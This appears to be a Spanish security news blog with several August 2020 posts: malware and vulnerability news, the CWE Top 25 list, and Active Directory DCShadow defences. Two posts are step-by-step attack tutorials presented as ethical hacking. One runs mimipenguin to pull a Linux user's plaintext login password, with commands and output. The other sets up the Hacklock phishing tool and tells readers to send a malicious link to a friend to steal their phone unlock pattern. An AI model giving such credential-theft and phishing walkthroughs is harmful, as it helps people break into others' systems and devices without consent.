domingo, 23 de agosto de 2020

HERRAMIENTA PARA ROMPER CONTRASEÑAS LINUX – TODO EN MENOS DE UN MINUTO

INTRODUCCIÓN

Con esta herramienta podemos descifrar/extraer las credenciales de inicio de sesión de un usuario de Linux. Minipenguin fue desarrollado por Hunter Gregal y su objetivo principal es robar las credenciales de inicio de sesión (nombre de usuario y contraseña) en el texto plano para acceder a un sistema operativo Linux. Esta herramienta es gratuita y de código abierto y, acorde a los investigadores en hacking ético del Instituto Internacional de Seguridad Cibernética (IICS), es útil en cualquier sistema operativo.

ENTORNO

  • Sistema operativo: Kali Linux 2020 de 64 bits
  • Versión de kernel: 5.6.0

PASOS DE INSTALACIÓN

  • Utilice este comando para clonar el proyecto:
  • git clone https://ift.tt/2oqS2kN
root@kali:/home/iicybersecurity# git clone https://github.com/huntergregal/mimipenguin
Cloning into 'mimipenguin'...
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 529 (delta 0), reused 1 (delta 0), pack-reused 525
Receiving objects: 100% (529/529), 182.38 KiB | 456.00 KiB/s, done.
Resolving deltas: 100% (241/241), done.
  • Use el comando cd para ingresar al directorio mimipenguin
root@kali:/home/iicybersecurity# cd mimipenguin/
root@kali:/home/iicybersecurity/mimipenguin#
  • Utilice el comando python3 mimipenguin.py para extraer las credenciales de inicio de sesión
root@kali:/home/iicybersecurity/mimipenguin# python3 mimipenguin.py
[SYSTEM - GNOME]        iicybersecurity:12ABc56
  • Se extrajo con éxito el nombre de usuario y la contraseña, mencionan los expertos en hacking ético

CONCLUSIÓN

Los especialistas en hacking ético han demostrado cómo extraer las credenciales de inicio de sesión de Linux con éxito. De la misma forma, podemos utilizarlo en cualquier sistema operativo Linux con facilidad.

El cargo HERRAMIENTA PARA ROMPER CONTRASEÑAS LINUX – TODO EN MENOS DE UN MINUTO apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

sábado, 22 de agosto de 2020

CÓMO ROBAR EL PIN Y CONTRASEÑA DE CUALQUIER CELULAR DESDE TU TELÉFONO MÓVIL

INTRODUCCIÓN

Como todos sabemos, hay tres métodos diferentes para bloquear la pantalla de un dispositivo Android: huella digital, contraseña, patrón. Si sus amigos usan un patrón como bloqueo de teléfono, es fácil obtener acceso a su pantalla desbloqueada mediante un ataque de phishing desde un teléfono móvil. Investigadores en hacking ético del Instituto Internacional de Seguridad Cibernética (IICS) demostraron cómo se puede robar el PIN de Android/iPhone de un amigo utilizando un solo enlace generado desde una terminal de cómputo.

Hoy demostraremos cómo se puede realizar un ataque de phishing desde un teléfono móvil utilizando Termux. Puede utilizar esta herramienta en cualquier móvil Android con acceso a red móvil.

ENTORNO

  • Descargue Termux en su dispositivo móvil

INSTALACIÓN

  • En la terminal Termux, use el comando pkg install git para instalar
$ pkg install git Testing the available mirrors: [*] https://dl.bintray.com/termux/termux-packages-24: ok [*] https://grimler.se/termux-packages-24: ok [*] https://main.termux-mirror.ml: ok [*] https://termux.mentality.rip/termux-packages-24: ok ==================================================================================================SNIP=================================================================================================== 
Preparing to unpack ...
/pcre2_10.35-1_aarch64.deb ... 
Unpacking pcre2 (10.35-1) ... 
Selecting previously unselected package git. Preparing to unpack .../git_2.28.0_aarch64.deb ... 
Unpacking git (2.28.0) ...
 Setting up pcre2 (10.35-1) ... 
Setting up git (2.28.0) ...
  • Ahora, instale python2 usando el comando pkg install python2
$ pkg install python2
Checking availability of current mirror: ok
Ign:1 https://dl.bintray.com/termux/termux-packages-24 stable InRelease
Ign:2 https://dl.bintray.com/grimler/game-packages-24 games InRelease
Ign:3 https://dl.bintray.com/grimler/science-packages-24 science InRelease
Get:4 https://dl.bintray.com/termux/termux-packages-24 stable Release [8255 B]
===========================================================================================================SNIP===========================================================================================================================
Looking in links: /data/data/com.termux/files/usr/tmp/tmpWcU25u
Collecting setuptools
Collecting pip
Installing collected packages: setuptools, pip
Successfully installed pip-19.2.3 setuptools-41.2.0
  • A continuación, use este comando para clonar el archivo
  • git clone https://ift.tt/3blE2A3
$ git clone https://github.com/noob-hackers/hacklock
Cloning into 'hacklock'...
remote: Enumerating objects: 55, done.
remote: Counting objects: 100% (55/55), done.
remote: Compressing objects: 100% (50/50), done.
remote: Total 55 (delta 19), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (55/55), 73.39 KiB | 354.00 KiB/s, done.
  • Use el comando cd para ingresar al directorio de hacklock
  • Ahora, use el siguiente comando para instalar la dependencia de la herramienta
$ pip install lolcat
Collecting lolcat
  Downloading lolcat-1.4.tar.gz (44 kB)
  |███████▎                        | 10 kB 3.2      |██████████████▋                 | 20 kB 269      |██████████████████████          | 30 kB 301      |█████████████████████████████▎  | 40 kB 290      |████████████████████████████████| 44 kB 253 kB/s
Using legacy setup.py install for lolcat, since package 'wheel' is not installed.
Installing collected packages: lolcat
    Running setup.py install for lolcat ... done
Successfully installed lolcat-1.4
WARNING: You are using pip version 20.1.1; however, version 20.2.2 is available.
You should consider upgrading via the '/data/data/com.termux/files/usr/bin/python3 -m pip install --upgrade pip' command.
  • A continuación, use el comando bash hashlock.sh para iniciar la herramienta
Hacklock - Tool Launch
  • La herramienta fue lanzada con éxito
  • Ahora, elija la opción 1 para robar el patrón de móvil de su amigo, mencionan los expertos en hacking ético
Hacklock - Malicious Link
  • Después de elegir la opción, descargue e inicie el servidor PHP/Ngrok y proporcione el enlace malicioso
  • Ahora, envíe este enlace malicioso a la víctima. Si la víctima abre este enlace malicioso en su navegador, podrá ver el patrón de bloqueo de la víctima en su navegador
Hacklock - Pattern
  • Si la víctima intenta proporcionar su patrón en esta página, este bloqueo se enviará de vuelta al móvil del hacker con los números de patrón
Hacklock - Credentials
  • Obtuvimos con éxito el patrón de la víctima

CONCLUSIÓN

Los especialistas en hacking ético nos mostraron cómo robar el PIN del patrón de la víctima usando Hacklock, herramienta de phishing. Por lo tanto, siempre se recomienda no visitar ningún sitio web no autorizado y compartir sus datos personales, como número de tarjeta de crédito o contraseña u otros detalles.

El cargo CÓMO ROBAR EL PIN Y CONTRASEÑA DE CUALQUIER CELULAR DESDE TU TELÉFONO MÓVIL apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

viernes, 21 de agosto de 2020

Troyano bancario Grandoreiro se hace pasar por la Agencia Tributaria de España

Los contribuyentes son uno de los grupos más expuestos a las actividades cibercriminales. Acorde a especialistas en seguridad en la nube, múltiples grupos de hackers maliciosos llevan meses operando campañas en las que tratan de hacerse pasar por agencias gubernamentales del gobierno español, especialmente la Agencia Tributaria, con el objetivo de engañar a los usuarios y conseguir dinero o acceso a su información confidencial. 

La mayoría de estas campañas se relacionan con el troyano bancario conocido como Grandoreiro, detectado en múltiples ciberataques, principalmente en países latinoamericanos. En el caso de España, los hackers maliciosos han estado enviando correos electrónicos supuestamente provenientes de la Agencia Tributaria.

Esta campaña comenzó el 11 de agosto de 2020, cuando muchos ciudadanos españoles comenzaron a recibir correos enviados desde contato@acessofinanceiro[.]com. En el mensaje se pide a los usuarios que descarguen un archivo ZIP que contiene un supuesto recibo fiscal, haciendo énfasis en que resta un documento que debe ser presentado en conjunto con un monto a pagar. 

FUENTE: ESET

El enlace adjunto redirige a los usuarios a un dominio registrado el mismo 11 de agosto. No obstante, la información enviada por el whois menciona que el país donde el registro se presentó es Brasil, un indicio de la identidad de los actores de amenazas. 

FUENTE: ESET

En la investigación, llevada a cabo por los investigadores de ESET, también se ha identificado al troyano bancario Mekotio distribuido de forma similar.

EJECUCIÓN DEL MALWARE

La cadena de infección es prácticamente idéntica a la de otros troyanos bancarios, mencionan los expertos en seguridad en la nube. Para comenzar, los hackers colocan el archivo malicioso en un dominio comprometido o usando servicios de almacenamiento como Dropbox.

FUENTE: ESET

La carga útil ZIP contiene un archivo MSI y un GIF. También debe tenerse en cuenta que el nombre del archivo ZIP tiene el código de país “ES” al final.

FUENTE: ESET

Las soluciones de seguridad de ESET detectan este archivo MSI como una variante de Win32/TrojanDownloader.Delf.CYA, un downloader malicioso responsable de introducir otras variantes de malware en el sistema objetivo.   

FUENTE: ESET

Aquí, los especialistas en seguridad en la nube encontraron una nueva variante del troyano bancario Grandoreiro.

Es importante que los contribuyentes en España traten de permanecer alertas ante esta campaña maliciosa, pues es altamente probable que los actores de amenazas sigan enviando estos correos electrónicos de phishing. Aplicar filtros de correo electrónico y soluciones de seguridad siempre será buena opción para mitigar estos ataques.   

El cargo Troyano bancario Grandoreiro se hace pasar por la Agencia Tributaria de España apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

Las 25 vulnerabilidades de software más peligrosas de 2020

El sistema de categorización de vulnerabilidades Common Weakness Enumeration (CWE) ha publicado su TOP 25, donde se reúnen las fallas de seguridad más comunes y peligrosas de los últimos dos años. Acorde a especialistas de un curso de seguridad informática, CWE considera que las fallas enlistadas son altamente peligrosas debido a su facilidad de explotación, su capacidad de disrupción y la frecuencia con la que se produce un ataque relacionado. 

Para la creación de esta lista, CWE consideró la información disponible en sistemas como el Common Vulnerabilities and Exposures (CVE), el Common Vulnerability Scoring System (CVSS), así como la información disponible en National Vulnerability Database (NVD).   

A continuación se muestra la lista de las debilidades elegidas por los especialistas del curso de seguridad informática:

FUENTE: CWE

Los expertos mencionan que la principal diferencia entre este TOP 25 y el anterior es el paso a la explotación de fallas específicas en vez de fallas a nivel clase. Aunque estas fallas a nivel de clase aún pueden verse en la lista, su clasificación bajó considerablemente. Los especialistas consideran que esta tendencia se mantenga en el futuro cercano.

En la lista, las fallas a nivel clase CWE-119 (restricción inadecuada de operaciones dentro de los límites del búfer), CWE-20 (validación de entrada incorrecta) y CWE-200 (exposición de información sensible) bajaron algunos puntos. Por otra parte, errores específicos como CWE-79 (incorrecta neutralización de entrada en la generación de páginas web) han mostrado un incremento notable, mencionan los especialistas del curso de seguridad informática.

Las fallas que más incrementaron sus puntajes en el más reciente listado son:

  • CWE-522 (Credenciales protegidas de forma inadecuada): del #27 al #18
  • CWE-306 (Falta autenticación en funciones crítica): de #36 a #24
  • CWE-862 (Falta de mecanismos de autorización): del #34 al #25
  • CWE-863 (Autorización incorrecta): del #33 al #29

Como puede notarse, estas fallas residen en algunas de las áreas más difíciles de analizar en un sistema informático. Por otra parte, los especialistas creen que la comunidad de usuarios ha mejorado sus capacidades de análisis y protección, lo que ha reducido considerablemente la incidencia de múltiples fallas de seguridad.   

Las fallas que más bajaron sus puntajes en las listas son:

  • CWE-426 (Ruta de búsqueda no confiable): del #22 al #26
  • CWE-295 (Validación de certificado incorrecta): del #25 al #28
  • CWE-835 (Bucle con condición de salida inalcanzable): de #26 a #36
  • CWE-704 (Conversión de tipo incorrecta): de #28 a #37

Este TOP 25 puede ser de gran utilidad para los desarrolladores, investigadores y usuarios, pues representa un informe ideal de las fallas más constantemente encontradas, en otras palabras, es una representación de las tendencias cibercriminales.

El cargo Las 25 vulnerabilidades de software más peligrosas de 2020 apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

jueves, 20 de agosto de 2020

Hacker se apodera de una empresa al cambiar los registros gubernamentales del auténtico dueño

La ausencia de mecanismos de autenticación en algunas plataformas en línea puede representar serios problemas para sus usuarios. Expertos de un curso de hacking ético detallan cómo un empresario del condado de Volusia, Florida, fue víctima de una variante de fraude debido a las pocas medidas de seguridad en un sitio web gubernamental.

Blair Burk, propietario de Medical Facilities Construction Group, una compañía que construye y da servicio de mantenimiento a consultorios médicos, afirma que un hacker ingresó en los registros estatales de su empresa, modificando la información y eliminando su nombre de estos registros. “Este hombre entró y dijo que era el presidente de mi empresa. Ni siquiera puedo entender qué pasó”, menciona la víctima.

No obstante, el perfil de la empresa en la División de Corporaciones de Florida, encargada del registro oficial de compañías locales, menciona que el propietario es un individuo llamado Nicolas Carioti, originario del sur de Florida. Al parecer, alguien hackeó los registros oficiales, almacenados en Sunbiz.org: “Nunca pensé que alguien pudiera simplemente entrar al sistema y cambiar esta información”, agrega Burk.   

Esto es en sí mismo algo muy grave, aunque los expertos del curso de hacking ético mencionan que faltaba lo peor. Después de consultar con los encargados de la plataforma, Burk descubrió que su información no estaba protegida con contraseñas o algún otro requerimiento de autenticación, por lo que cualquier usuario podría cambiar sus registros corporativos oficiales: “Es algo que está permitido, no hay nada que pueda evitarlo. Si le preguntas a los responsables dicen que lo lamentan, pero que sólo los legisladores pueden cambiar la situación”.

Burk sólo recibió una alerta del gobierno a través de su correo electrónico en la que se le informaba del cambio en los registros corporativos. El empresario teme que el individuo que modificó esta información trate de obtener un beneficio a costa de su compañía, como solicitar un préstamo bancario, redactar un contrato o alguna otra variante de fraude bancario.

Tommy Orndorf, experto de un curso de hacking ético, analizó lo ocurrido a Burk, mencionando que es posible realizar cambios en estos perfiles sin uso de contraseñas o cualquier otra forma de verificación: “Estas plataformas deben contar con algún mecanismo de verificación, no usar solo un correo electrónico”, menciona el especialista.

Al ser consultada al respecto, la División de Corporaciones de Florida mencionó que la queja de Burke ya había sido atendida y las fallas en su sitio web fueron corregidas. No obstante, el usuario afectado sigue temiendo la posibilidad de que alguien pueda infiltrarse en estos registros: “Tardé tres días en solucionar esto y no quiero volver a pasar por una situación similar”, concluye Burke.

El cargo Hacker se apodera de una empresa al cambiar los registros gubernamentales del auténtico dueño apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

En pleno 2020 se encontraron nombres de usuario y contraseñas en hard-code para Cisco Virtual Wide Area Application Services (vWAAS). Actualice ahora

Especialistas en seguridad en la nube revelaron el hallazgo de una vulnerabilidad en Virtual Wide Area Application Services (vWAAS), de Cisco, una implementación virtual, tanto para empresas como para proveedores de servicios, que acelera las aplicaciones comerciales entregadas desde la infraestructura de nube privada virtual y privada. Según el reporte, la explotación exitosa de estas fallas permitiría a los actores de amenazas obtener control completo del sistema objetivo.

A continuación se presenta una breve reseña de la falla reportada, además de su clave de identificación y puntaje según el Common Vulnerability Scoring System (CVSS).

CVE-2020-3446: La presencia de credenciales codificadas de forma rígida (hard-code) en Virtual Wide Area Application Services (vWAAS) con Cisco Enterprise NFV Infrastructure Software (NFVIS) permitiría a los hackers maliciosos remotos no autenticados acceder al sistema afectado.

Acorde a los expertos en seguridad en la nube, la explotación exitosa de esta falla podría comprometer el sistema vulnerable por completo.

Las versiones de Cisco Wide Area Application Services vulnerables son: 6.0(1), 6.1(1), 6.2(1), 6.2(3), 6.2(3a), 6.2(3b), 6.2(3c), 6.2(3e)31, 6.2(3e)40, 6.3(1), 6.4(1), 6.4(3d). Esta vulnerabilidad afecta a los dispositivos de la serie Cisco ENCS 5400-W y CSP 5000-W si ejecutan Cisco vWAAS con las versiones 6.4.5 o 6.4.3d de imágenes empaquetadas con NFVIS y anteriores.

Esta es considerada una vulnerabilidad crítica y recibió un puntaje CVSS de 8.5/10.

Si bien los especialistas en seguridad en la nube mencionan que la falla puede ser explotada por actores de amenazas remotos a través de Internet, aún no se han detectado intentos de explotación activa o algún malware relacionado con el ataque. Las actualizaciones ya están listas, por lo que se recomienda a los administradores de implementaciones afectadas actualizar a la brevedad.

El cargo En pleno 2020 se encontraron nombres de usuario y contraseñas en hard-code para Cisco Virtual Wide Area Application Services (vWAAS). Actualice ahora apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

Protección contra ataques DCShadow de Active Directory

Las variantes de malware más peligrosas son aquellas que reciben actualizaciones constantes, mejorando sus capacidades para comprometer los sistemas atacados, mencionan expertos de un curso de seguridad informática. Mimikatz es una herramienta de post explotación de código abierto empleada en ataques basados en credenciales de Windows. Hace un par de años sus desarrolladores incluyeron DCShadow, una característica del módulo lsadump que permite a los actores de amenazas obtener acceso privilegiado persistente en Windows Server Active Directory (AD), además de cubrir los rastros del ataque.

Los ataques contra AD son algo muy común, pues este controla la seguridad en la mayoría de los sistemas donde se implementa. Cuando los hackers maliciosos obtienen acceso privilegiado a AD, también pueden comprometer los servidores y dispositivos unidos al dominio AD.

Cuando se trata de ataques DCShadow, se registra cualquier dispositivo de Windows unido al dominio AD como controlador de dominio (DC) mediante la creación de dos nuevos objetos en la partición de configuración del dominio. Este ataque se puede realizar desde Windows 10 y, aunque Windows 10 no puede ser un DC, DCShadow engaña a la implementación de AD para que piense que Windows 10 es en realidad un DC, mencionan los expertos del curso de seguridad informática.

Si bien estos ataques son una tendencia creciente en el mundo del cibercrimen, es posible implementar algunas medidas para su prevención. Los investigadores de la firma de seguridad Petri mencionan que la mejor forma de evitar estos ataques es impedir que los hackers maliciosos obtengan acceso privilegiado al sistema objetivo, lo cual es posible mediante algunos métodos descritos a continuación.

Estaciones de trabajo con acceso privilegiado

Es altamente recomendable usar sólo credenciales de administrador de dominio (y otras cuentas con altos privilegios) en estaciones de trabajo con las medidas de seguridad necesarias. Estas estaciones de trabajo de acceso privilegiado (PAW) están aisladas del Internet público.

Delegación de privilegios para tareas menores

La administración de usuarios y grupos pueden ser fácilmente llevadas a cabo por otros usuarios además del administrador, lo mejor es que no es necesario otorgar acceso privilegiado al dominio, según los expertos del curso de seguridad informática.

Protección de cuentas con herramientas de Windows

Credential Guard, herramienta de Windows Defender, proporciona protección adicional para las cuentas de dominio, aislando las credenciales en una zona a la que el kernel del sistema no puede acceder. Otras herramientas como Credential Guard requieren que un dispositivo sea compatible con seguridad basada en virtualización (VBS).

Identidad privilegiada

Una solución de administración de identidades privilegiadas (PIM) puede ayudar a las organizaciones a monitorear y controlar el acceso privilegiado a AD. Los directores de sombra de Windows Server 2016 y los grupos de AD de corta duración ayudan a las empresas a tomar el control de Active Directory cuando se utilizan con un bosque de AD especialmente reforzado para la administración.

FUENTE: Petri

Estos mecanismos, en conjunto con el registro de actividad y un adecuado monitoreo de seguridad, deberán permitir a los administradores de dominio mitigar el riesgo de ataque.  

El cargo Protección contra ataques DCShadow de Active Directory apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente